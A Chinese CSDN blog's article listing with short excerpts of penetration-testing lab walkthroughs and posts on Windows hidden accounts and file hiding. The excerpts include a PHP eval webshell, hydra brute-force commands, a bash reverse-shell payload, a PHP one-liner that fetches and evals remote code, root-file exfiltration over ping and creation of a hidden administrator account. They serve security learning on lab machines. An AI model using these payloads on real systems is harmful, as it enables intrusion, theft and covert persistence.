自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(57)
  • 收藏
  • 关注

原创 Servlet

MVC工作流程Controller接收用户的请求,并决定调用哪个Model来进行处理Model用逻辑处理用户的请求并返回数据View将返回的数据呈现给用户ServletServlet 其实是在 Java Web 容器中运行的小程序。用户通常使用 Servlet 来处理一些较为复杂的服务器端的业务逻辑。Servlet的配置基于web.xml在 web.xml 中,Servlet 的配置在 Servlet 标签中,Servlet 标签是由 Servlet 和 Servlet-mapping 标

2022-05-20 09:00:00 278

原创 靶机渗透日记

IP探测端口扫描访问 80 端口目录扫描访问 tips.txt提示寻找 creds.txt ,访问 creds.txt 文件不存在访问 /webdav 目录WebDAV 基于 HTTP 协议的通信协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。因为基于HTTP,在广域网上共享文件有天然的优势,移动端文件..

2022-04-29 10:00:00 318

原创 靶机渗透日记

IP地址探测端口扫描访问80端口FTP不能匿名访问目录扫描访问 /hidden_text点击 Thank You 出现一个二维码通过对二维码解码,获得FTP的账号密码登录FTP查看information.txt文件robin的密码可能是p_lists.txt其中的一个爆破ssh登录ssh获得flag1执行sudo -lfeedback.sh文件内容如下#!/bin/bashclearecho -e "Scri..

2022-04-28 11:52:54 262

原创 靶机渗透日记

IP端口访问 80 端口访问81端口,发现是极致CMS,并且查阅资料得知存在漏洞,但是需要先进后台目录扫描访问 readme.txt ,发现版本为 1.8.1/admin.php 即为后台管理登录爆破用户名密码,得到admin123通过插件getshell参考:极致CMS漏洞getshell配置密码编辑index.php文件插入$a = $GLOBALS;$str = '_POST';eval/**nice**/(''. $a[$st...

2022-04-02 10:30:00 436

原创 靶机渗透日记

端口访问 80,8080 端口[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TKhhG4Yh-1648536567888)(C:/Users/Administrator/AppData/Roaming/Typora/typora-user-images/image-20220329104817041.png)]思路:后台上传war包弱口令爆破使用burpsuite[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vBb1..

2022-04-01 10:30:00 110

原创 靶机渗透日记

端口访问http正在维护中目录扫描访问 phpphadmin版本为 5.1 ,搜索漏洞发现存在经过认证的远程命令执行(CVE-2019-9193)尝试弱口令,用户名为 postgres漏洞利用反弹shell信息收集存在 erik 用户隐藏文件查看 .creds.log目标主机的FTP可以匿名登录,其中一个文件说明了加密方式解密切换到 erik 用户查看 remove 文件运行了 time 命令,通过修改环境变量..

2022-03-31 09:30:00 122

原创 靶机渗透日记

端口访问 80 端口通过页面显示可以发现web尝试ping了访问者的IP地址抓包使用wireshark分析监听tcpdump -i eth0 icmp -w icmp发现有四个请求包,其中两个包内含有用户名和密码得到用户名和密码,使用ssh登录执行sudo -l通过ping命令发送文件本地监听tcpdump -i eth0 icmp -w rev服务器执行sudo sendfilebyping 192.168.0.128 /root/root.txt..

2022-03-30 09:30:00 288

原创 靶机渗透日记 noob

端口访问 6530 端口目录扫描/index (Status: 200) [Size: 19]/nt4share (Status: 301) [Size: 45] [--> /nt4share/]访问 /nt4share使用私钥进行ssh登录获取用户名创建软连接ln -s /root rootssh 连接...

2022-03-29 10:00:00 180

原创 靶机渗透日记

端口访问 80 端口just a picture目录扫描/index.html (Status: 200) [Size: 80]/javascript (Status: 301) [Size: 319] [--> http://192.168.0.140/javascript/]/advanced-search (Status: 301) [Size: 324] [--> http://192.168.0.140/ad..

2022-03-28 09:00:00 429

原创 靶机渗透日记

端口访问 80 端口文件上传功能,上传php文件目录扫描访问 /uploads 提示 403 ,但是可以访问到上传的文件再次上传文件发现延迟了3s,猜测是等待了3s后对文件变更名字,可以尝试在这3s内不断访问该文件创建脚本,并上传反弹shell#!/bin/bashwhile truedo curl "http://192.168.0.139/uploads/shell.php"done成功反弹在 /opt/gancio 目录下..

2022-03-25 10:00:00 369

原创 靶机渗透日记

端口访问 80 端口源代码中包含作者目录扫描,发现 /secrets继续对该目录扫描对登录框进行爆破hydra -l brad -P /usr/share/wordlists/rockyou.txt 192.168.0.138 http-post-form "/secrets//MK67IT044XYGGIIWLGS9.php:user=brad&password=^PASS^:Invalid Credentials"登录网站是一个输入框,并且只..

2022-03-24 10:00:00 152

原创 靶机渗透日记

IP端口访问80端口,空白页面目录扫描访问 sshnote.txt根据提示,RSA key 中的三个大写字母被*号替换了,并且用户为 sophie利用网站中的cookiebase64解码为 poisonedgift.txt ,访问得到私钥保存为 id_rsa生成三个大写字母的字典crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > dict.txt创建存在 id_rsa 的目录mkdir keysdir创建脚..

2022-03-23 15:00:00 333

原创 靶机渗透日记-内网

WEBwin7/admin域成员win2016/Admin#123域控administrator/Admin@666流程IP探测端口扫描Win7系统,并且开放了139,445端口,尝试MS17-010返回 system 权限还有一种思路就是利用80端口的通达OA系统使用工具上传一句话木马,使用蚁剑连接GETSHELL信息收集,发现WEB服务器存在双网卡添加路由信息run post/multi/manage/autoro..

2022-03-22 14:35:38 3595

原创 靶机渗透日记 DarkHole2

端口访问 80 端口目录扫描发现存在 .git 泄露,登录页面需要输入邮箱及密码,除此之外并没有其他信息下载 .git 源码wget -r http://192.168.0.134/.git 查看 git 日志git log图中显示带有默认凭证的login.php文件切换到该版本进行查看git checkout a4d9得到账号密码登录用户可以发现 URL 中带有参数 id,发现存在SQL注入http://192.168.0.134/dash..

2022-03-10 08:00:00 169

原创 靶机渗透日记 Billu_b0x

端口访问 80 端口目录扫描/add.php 文件下存在文件上传没有上传成功/test.php缺少 file 参数,构造URLhttp://ip/test.php?file=/etc/passwd尝试不行,使用 post 方式依次读取目录扫描到的文件//add.php<?phpecho '<form method="post" enctype="multipart/form-data"> Select image to ..

2022-03-09 08:00:00 302

原创 靶机渗透 blog

端口访问 80 端口目录扫描在 /my_weblog 目录下访问 README发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞需要使用到后台的账号密码账号爆破hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incor..

2022-03-08 08:00:00 254

原创 靶机渗透日记

端口访问 80 端口wordpress 搭建的网站目录扫描使用 wpscan 扫描没有扫描到插件信息,但是扫描到了 admin 用户爆破 adminwpscan --url http://192.168.0.134 -U admin -P /usr/share/wordlists/rockyou.txt得到账号密码,登录后台,编辑模板成功GETSHELL信息收集ls -al /var/www/.bash_history结合下面 su - fat..

2022-03-07 08:00:00 152

原创 靶机渗透日记

IP端口访问 80 端口发现是 wordpress 主题目录扫描只有一个 index.html查看网页源代码查阅资料得知上面的 html 页面是一种加密方式,需要对其解密,密码格式如源码中显示得到 sys.hidden.hmv访问该域名目录扫描发现了三个目录,依次对目录进行扫描,最终再 /weapon 目录下发现 loot.php访问该页面发现是空白,猜测有文件包含或者有参数ffuf -u http://sys.hidden.hmv/..

2022-03-05 10:00:00 159

原创 靶机渗透日记 [入门级]

端口访问 80 端口不要想太多,非常简单 😂目录扫描只有一个 index.html,除此之外没有任何东西根据提示直接爆破 ssh

2022-03-04 08:00:00 162

原创 靶机渗透日记

端口目录访问 80 端口发现存在上传功能发现可以上传文件,但是不能解析查找子域名ffuf -u http://forge.htb -w subdomains-top1million-5000.txt -H "HOST:FUZZ.forge.htb" -mc 200访问子域名,提示只能本地访问返回上传页面,还存在一个从URL上传的选项这里本地起一个web服务器,请求web服务器上的一个文件发现目标主机确实向本地的服务器请求了 123.php ,这里..

2022-03-02 08:00:00 151

原创 靶机渗透日记

IP端口访问 80 端口目录扫描robots.txt & note.txt访问 crossroads.png ,是一张图片访问 SMBsmbclient -L 192.168.0.133访问 smbshare 提示需要密码对目标上的SMB信息进行枚举enum4linux 192.168.0.133 -A爆破 SMB 密码登录 SMB 服务smbclient //192.168.0.133/smbshare -U ..

2022-03-01 13:04:31 3518

原创 靶机渗透日记 responder

IP端口访问 80 端口只有一句话,目录扫描访问 /filemanager.php 会跳转到 index.php ,可能是因为没有参数的原因,接下来爆破参数ffuf -u http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd -w /root/Filenames_or_Directories_All.txt -fs 0得到参数 random ,burpsuite 抓包测试使用 php 伪协议读取 filemanag..

2022-02-28 13:34:56 3210

原创 靶机渗透日记 otp

IP端口访问 80 端口目录扫描子域名扫描访问子域名这里存在一个 Login 登录框,账号密码存在个人信息中的源码中登录后得到一个新的用户名 david由于目标机器还开放了21号端口,尝试进行爆破连接 FTP查看 Apache 配置文件找到网站的根目录这里发现文件夹 u9104d_ 完全访问权限将 webshell 上传至该文件夹中直接连接在 /otp 目录下 存在 sql 文件使用 base32 解码得到 n3v..

2022-02-28 08:00:00 236

原创 靶机渗透日记 messages

IP端口访问 80 端口两个功能点,一个是 chatbot ,一个是 Webmail对这两部分进行目录扫描发现在 /chatbot 目录下存在 后台登陆页面寻找源码,关键字 Simple ChatBot Application得到后台的默认密码,成功访问登录到后台发现可以上传头像,上传一个 webshell ,这里上传一句话发现怎么都无法连接,并且我只能上传到 user_avatar ,上传到 bot_avatar 上会变成 jsp 后缀文件在 /h..

2022-02-26 12:20:01 355

原创 靶机渗透日记 controller

IP端口目录扫描发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来访问80端口文档说明我们可以上传一个项目,并可以被运行服务器还开放了 139,445 端口,访问 SMB 服务可以匿名访问上传 shell.txtimport commandscommands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/t..

2022-02-25 12:13:31 1841

原创 靶机渗透日记 funbox

ip端口访问 80 端口目录扫描访问 robots.txt , /secret ,/admin/?/login 发现都没有得到有用的东西,继续对 /store 目录扫描同样存在后台地址访问该后台地址这里通过尝试弱口令或者在 books 标签页中发现参数 bookisbn 存在sql注入,通过 sqlmap 也可以得到后台管理员的账号密码发现存在文件上传,尝试上传webshell在Image可以直接上传.php可以成功getshell在 /home/to.

2022-02-22 09:42:28 919

原创 靶机渗透日记 利用SSRF

端口这里应该没有一个处于 filter 的 ftp 端口目录访问 80 端口发现存在上传功能发现可以上传文件,但是不能解析查找子域名ffuf -u http://forge.htb -w subdomains-top1million-5000.txt -H "HOST:FUZZ.forge.htb" -mc 200访问子域名,提示只能本地访问返回上传页面,还存在一个从URL上传的选项这里本地起一个web服务器,请求web服务器上的一个文件发现目..

2022-02-11 08:00:00 435

原创 靶机渗透日记 Jangow

ip端口测试发现不能匿名登录 ftp目录扫描发现敏感文件 .backup 访问浏览网站页面,发现其中一个页面可以执行命令利用命令执行无法反弹shell,生成一句话在 /home/jangow01 得到 flag1发现 443 端口没有被做限制反弹shell发现存在 jangow01 用户使用 .backup 里的账号密码尝试登录提权可以看到可以使用 dirtycow 进行提权 ,靶机直接死机 换成 CVE-201..

2022-02-10 08:00:00 288

原创 windows文件隐藏

一、为文件或目录设置隐藏属性Attrib语法attrib [{+r|-r}] [{+a|-a}] [{+s|-s}] [{+h|-h}] [[Drive**:][Path] FileName] [/s**[/d]]参数+r :设置只读文件属性。-r :清除只读文件属性。+a :设置存档文件属性。-a :清除存档文件属性。+s :设置系统文件属性。-s :清除系统文件属性。+h :设置隐藏文件属性。-h :清除隐藏文件属性。[ Drive : ][ Path ] FileNam

2022-02-09 10:00:00 628

原创 靶机渗透日记 domdom

ip端口访问80端口目录扫描访问 /admin.php使用 burp 抓包将 index.php 修改成 admin.php添加 cmd 参数,结果返回响应的信息反弹shellname=123&username=123&password=123&access=access&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.1..

2022-02-08 16:00:00 294

原创 WAF分类

可以把WAF分为四类:云WAF类云waf基于云端的检测,安装简单,修改DNS解析或在服务器安装云WAF的模块即可。安全宝创宇盾玄武盾腾讯云百度云西部数码阿里云盾奇安信网站卫士硬件WAF类硬件WAF串联在内网的交换机上,防护范围大。绿盟安恒铱迅天融信深信服启明星辰知道创宇F5 BIG-IP软件WAF类软件WAF安装在服务器上根据网站流量决定占用的内存量。D盾:http://www.d99net.net/云锁:https://yunsuo.qianxin.co

2022-02-08 08:00:00 342

原创 靶机渗透日记 hackNos: Os-Hax

靶机地址:https://www.vulnhub.com/entry/hacknos-os-hax,389/文章目录信息收集Getshell方法一方法二提权参考链接信息收集ip端口目录扫描发现存在 wordpress使用 wpscan发现存在 web 用户没有发现插件在 /img 目录下存在 flaghost.png用exiftool查看了一下图片信息exiftool flaghost.png可能是 web 用户的密码,尝试后发现是路径

2022-02-07 10:00:00 239

原创 靶机渗透日记 Trollcave

IP端口访问80端口右侧出现了用户,点击 xer 用户,url栏如下我们尝试更改 /users/ 后的值,发现此处存在用户遍历,修改成 1 时,用户是 King 为 superadmin 权限,修改成 2 时,用户是 dave 为 admin有一篇文章提到了关于重置用户密码访问 192.168.154.134/password_resets 提示不存在,扫描后得到路径尝试修改用户 king 和 dave 发现修改不成功,提示只能修改普通用户,我们修改 xer 用户,此..

2022-02-03 14:00:00 360

原创 靶机渗透日记

0x01 信息收集ip端口nmap -sC -sV -p- -T4 10.35.0.119从 Nmap 扫描中,我们看到了一个 git 远程存储库该 cms 是一个网上录取系统,网站源码如下0x02 代码审计adminsession.php 用来检查管理员会话<?phpextract($_POST);if (!isset($_SESSION[ad])){ echo "<br>You are not Logged In Pl

2022-02-02 14:00:00 302

原创 靶机渗透日记

IP端口访问80端口网页源码目录扫描访问robots.txt看起来并没有什么作用,其实是提示我们组成一个字符串s3cr3tz0n3拼接该字符串组成URL,返回音符

2022-02-01 16:18:18 2589

原创 靶机渗透日记

IP为 192.168.154.130端口扫描,开放了 22,80 ,8080访问80端口访问8080端口目录扫描note.txt内容如下Alert!We have a vulnerability in our java application...Notify the programming department to check Log4J.-Admin提示存在log4j漏洞...

2022-01-25 15:08:41 2216

原创 靶机渗透日记

探测IP为192.168.1.214端口开放了22,80端口目录扫描访问 80 端口这里并没有发现其他可以利用的东西访问 notes.txt暂时用处也不大访问 assets 文件夹里面是一些js,css,图片也没有利用点接下来在主页进行抓包在主页发现cookie值像是base64解密为false,尝试改成true并进行base64加密更改cookie值刷新页面出现上传按钮进入后发现可以上传文件,这里可以将.php后缀更改为.p..

2022-01-21 13:12:20 2460

原创 windows隐藏账号

手动创建1.添加$符net user hacker$ Passw0rd /addnet localgroup administrators hacker$ /add但是在控制面板中可以查看到使用 wmic 也可以查看wmic useraccount get Name删除用户net user hacker$ /del2.修改注册表打开注册表HKEY_LOCAL_MACHINE\SAM\SAM\关闭注册表再次打开HKEY_LOCAL_MACHINE\SAM\SAM\Doma

2022-01-19 12:13:53 1399

原创 靶机渗透日记

IP为端口PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)80/tcp open http Apache httpd 2.4.48 ((Debian))访问 80 端口是一张图片,接下来目录扫描[23:08:42] 301 - 312B - /image -> http://192.168.1.64/image/ ..

2022-01-17 16:15:01 1285

原创 sqlmap中转注入

当使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书python3 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev}|_ -| . [)] | .'| . ||___|_ ["]_|_|_|__

2022-01-14 21:00:00 2127

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除